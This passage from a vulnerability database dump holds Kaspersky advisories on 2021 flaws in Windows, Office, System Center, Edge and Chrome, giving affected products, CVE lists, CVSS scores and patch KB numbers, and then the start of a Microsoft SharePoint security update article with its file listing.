x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nVP9 Video Extensions \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31975](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31975>) \n[CVE-2021-31967](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31967>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-31972](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31972>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31976](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31976>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31970](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31970>) \n[CVE-2021-33739](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33739>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-31951](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31951>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31952](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31952>) \n[CVE-2021-31974](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31974>) \n[CVE-2021-31955](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31955>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31960](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31960>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31969](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31969>) \n[CVE-2021-31977](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31977>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003681](<http://support.microsoft.com/kb/5003681>) \n[5003637](<http://support.microsoft.com/kb/5003637>) \n[5003671](<http://support.microsoft.com/kb/5003671>) \n[5003696](<http://support.microsoft.com/kb/5003696>) \n[5003646](<http://support.microsoft.com/kb/5003646>) \n[5003638](<http://support.microsoft.com/kb/5003638>) \n[5003697](<http://support.microsoft.com/kb/5003697>) \n[5003635](<http://support.microsoft.com/kb/5003635>) \n[5003687](<http://support.microsoft.com/kb/5003687>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014746](<http://support.microsoft.com/kb/5014746>) \n[5014701](<http://support.microsoft.com/kb/5014701>) \n[5023752](<http://support.microsoft.com/kb/5023752>) \n[5023764](<http://support.microsoft.com/kb/5023764>) \n[5023756](<http://support.microsoft.com/kb/5023756>) \n[5023765](<http://support.microsoft.com/kb/5023765>) \n[5023698](<http://support.microsoft.com/kb/5023698>) \n[5023702](<http://support.microsoft.com/kb/5023702>) \n[5023696](<http://support.microsoft.com/kb/5023696>) \n[5023697](<http://support.microsoft.com/kb/5023697>) \n[5023705](<http://support.microsoft.com/kb/5023705>) \n[5023787](<http://support.microsoft.com/kb/5023787>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12202 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-03-20T00:00:00", "id": "KLA12202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12202/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T15:46:18", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Malware Protection Engine\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31978](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31978>) \n[CVE-2021-31985](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31985>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft System Center Operations Manager](<https://threats.kaspersky.com/en/product/Microsoft-System-Center-Operations-Manager/>)\n\n### *CVE-IDS*:\n[CVE-2021-31978](<https://vulners.com/cve/CVE-2021-31978>)2.1Warning \n[CVE-2021-31985](<https://vulners.com/cve/CVE-2021-31985>)6.8High\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12197 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31978", "CVE-2021-31985"], "modified": "2021-06-22T00:00:00", "id": "KLA12197", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12197/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T17:35:53", "description": "### *Detect date*:\n04/22/2021\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the Settings and more menu, that are listed in your About Microsoft Edge page (Microsoft Edge About page usually can be accessed from the Help and feedback option) \n[Microsoft Edge update settings](<https://support.microsoft.com/en-us/topic/microsoft-edge-update-settings-af8aaca2-1b69-4870-94fe-18822dbb7ef1>)\n\n### *Original advisories*:\n[CVE-2021-21225](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21225>) \n[CVE-2021-21222](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21222>) \n[CVE-2021-21223](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21223>) \n[CVE-2021-21224](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21224>) \n[CVE-2021-21226](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://vulners.com/cve/CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://vulners.com/cve/CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://vulners.com/cve/CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://vulners.com/cve/CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://vulners.com/cve/CVE-2021-21224>)6.8High\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "kaspersky", "title": "KLA12153 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2023-03-28T00:00:00", "id": "KLA12153", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12153/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:47:04", "description": "### *Detect date*:\n04/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome earlier than 90.0.4430.85\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://vulners.com/cve/CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://vulners.com/cve/CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://vulners.com/cve/CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://vulners.com/cve/CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://vulners.com/cve/CVE-2021-21224>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "kaspersky", "title": "KLA12147 Multiple vulnerabiltiies in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-05-27T00:00:00", "id": "KLA12147", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12147/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:46:14", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Office Web Apps Server 2013 Service Pack 1 \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Office 2019 for Mac \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nOffice Online Server\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31940](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31940>) \n[CVE-2021-31949](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31949>) \n[CVE-2021-26420](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26420>) \n[CVE-2021-31948](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31948>) \n[CVE-2021-31966](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31966>) \n[CVE-2021-31939](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31939>) \n[CVE-2021-31965](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31965>) \n[CVE-2021-31941](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31941>) \n[CVE-2021-31963](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31963>) \n[CVE-2021-31964](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31964>) \n[CVE-2021-31950](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31950>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2021-31940](<https://vulners.com/cve/CVE-2021-31940>)6.8High \n[CVE-2021-31949](<https://vulners.com/cve/CVE-2021-31949>)6.8High \n[CVE-2021-26420](<https://vulners.com/cve/CVE-2021-26420>)6.5High \n[CVE-2021-31948](<https://vulners.com/cve/CVE-2021-31948>)5.5High \n[CVE-2021-31966](<https://vulners.com/cve/CVE-2021-31966>)6.5High \n[CVE-2021-31939](<https://vulners.com/cve/CVE-2021-31939>)6.8High \n[CVE-2021-31965](<https://vulners.com/cve/CVE-2021-31965>)4.0Warning \n[CVE-2021-31941](<https://vulners.com/cve/CVE-2021-31941>)6.8High \n[CVE-2021-31963](<https://vulners.com/cve/CVE-2021-31963>)6.5High \n[CVE-2021-31964](<https://vulners.com/cve/CVE-2021-31964>)5.5High \n[CVE-2021-31950](<https://vulners.com/cve/CVE-2021-31950>)5.5High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5001963](<http://support.microsoft.com/kb/5001963>) \n[5001946](<http://support.microsoft.com/kb/5001946>) \n[5001944](<http://support.microsoft.com/kb/5001944>) \n[5001955](<http://support.microsoft.com/kb/5001955>) \n[5001953](<http://support.microsoft.com/kb/5001953>) \n[5001943](<http://support.microsoft.com/kb/5001943>) \n[5001956](<http://support.microsoft.com/kb/5001956>) \n[5001939](<http://support.microsoft.com/kb/5001939>) \n[5001934](<http://support.microsoft.com/kb/5001934>) \n[5001954](<http://support.microsoft.com/kb/5001954>) \n[5001945](<http://support.microsoft.com/kb/5001945>) \n[5001947](<http://support.microsoft.com/kb/5001947>) \n[5001962](<http://support.microsoft.com/kb/5001962>) \n[4011698](<http://support.microsoft.com/kb/4011698>) \n[5001950](<http://support.microsoft.com/kb/5001950>) \n[5001922](<http://support.microsoft.com/kb/5001922>) \n[5001942](<http://support.microsoft.com/kb/5001942>) \n[5001951](<http://support.microsoft.com/kb/5001951>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12201 Multiple vulnerabilities in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2021-06-22T00:00:00", "id": "KLA12201", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12201/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-01-13T10:19:44", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint Server remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31963>).\n\n**Note: **To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## Known issues in this update\n\nWhen third-party assemblies try to access some sensitive properties, user code might be blocked. When this issue occurs, \u201c8gaol\u201d event entries are logged in SharePoint Unified Logging System (ULS) logs. For example, you may find the following entry in ULS logs: \n \n**8gaol Unable to access this sensitive property : <sensitive property name> from outer assembly.**To fix this issue, install KB5002013 and follow the guidance in KB5004581 to enable trusted third-party assemblies.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011698>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4011698 for the 64-bit version of SharePoint Enterprise Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=a385fbc2-ca6c-4abf-affd-92e6fb46688b>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see Security update deployment information: June 8, 2021.\n\n### Security update replacement information\n\nThis security update replaces previously released security update [3203397](<http://support.microsoft.com/kb/3203397>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nifsloc2013-kb4011698-fullfile-x64-glb.exe| B12C537E832EC6D9A0B81A8643D85F4A962BE8C3A272E041C7F6FF4323F5C21A \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nFor all supported x64-based versions of SharePoint Enterprise Server 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nifsadminpages.resx.1025| ipfsadminpages.ar-sa.resx| | 35374| 12-May-21| 12:39 \nifsmain.css.1025| ifsmain.css| | 9631| 12-May-21| 12:39 \nintlcorestrings.js.1025| intlcorestrings.js| | 24283| 12-May-21| 12:39 \nipfscore.resx.1025| ipfscore.ar-sa.resx| | 11789| 12-May-21| 12:39 \nipfs.resx.1025| ipfs.ar-sa.resx| | 11724| 12-May-21| 12:39 \nifsintl.dll.1025| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 236664| 12-May-21| 12:39 \nrepres.dll_1025| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1068| ipfsadminpages.az-latn-az.resx| | 32280| 12-May-21| 12:39 \nifsmain.css.1068| ifsmain.css| | 9166| 12-May-21| 12:39 \nintlcorestrings.js.1068| intlcorestrings.js| | 20967| 12-May-21| 12:39 \nipfscore.resx.1068| ipfscore.az-latn-az.resx| | 11188| 12-May-21| 12:39 \nipfs.resx.1068| ipfs.az-latn-az.resx| | 11214| 12-May-21| 12:39 \nifsintl.dll.1068| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 209584| 12-May-21| 12:39 \nrepres.dll_1068| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1026| ipfsadminpages.bg-bg.resx| | 39352| 12-May-21| 12:39 \nifsmain.css.1026| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1026| intlcorestrings.js| | 27949| 12-May-21| 12:39 \nipfscore.resx.1026| ipfscore.bg-bg.resx| | 13030| 12-May-21| 12:39 \nipfs.resx.1026| ipfs.bg-bg.resx| | 12994| 12-May-21| 12:39 \nifsintl.dll.1026| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 271440| 12-May-21| 12:39 \nrepres.dll_1026| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.5146| ipfsadminpages.bs-latn-ba.resx| | 31859| 12-May-21| 12:39 \nifsmain.css.5146| ifsmain.css| | 9158| 12-May-21| 12:39 \nintlcorestrings.js.5146| intlcorestrings.js| | 20158| 12-May-21| 12:39 \nipfscore.resx.5146| ipfscore.bs-latn-ba.resx| | 11043| 12-May-21| 12:39 \nipfs.resx.5146| ipfs.bs-latn-ba.resx| | 10797| 12-May-21| 12:39 \nifsintl.dll.5146| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 196784| 12-May-21| 12:39 \nrepres.dll_5146| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1027| ipfsadminpages.ca-es.resx| | 32565| 12-May-21| 12:39 \nifsmain.css.1027| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1027| intlcorestrings.js| | 20653| 12-May-21| 12:39 \nipfscore.resx.1027| ipfscore.ca-es.resx| | 11524| 12-May-21| 12:39 \nipfs.resx.1027| ipfs.ca-es.resx| | 11230| 12-May-21| 12:39 \nifsintl.dll.1027| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 208504| 12-May-21| 12:39 \nrepres.dll_1027| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1029| ipfsadminpages.cs-cz.resx| | 32303| 12-May-21| 12:39 \nifsmain.css.1029| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1029| intlcorestrings.js| | 20258| 12-May-21| 12:39 \nipfscore.resx.1029| ipfscore.cs-cz.resx| | 11202| 12-May-21| 12:39 \nipfs.resx.1029| ipfs.cs-cz.resx| | 11081| 12-May-21| 12:39 \nifsintl.dll.1029| 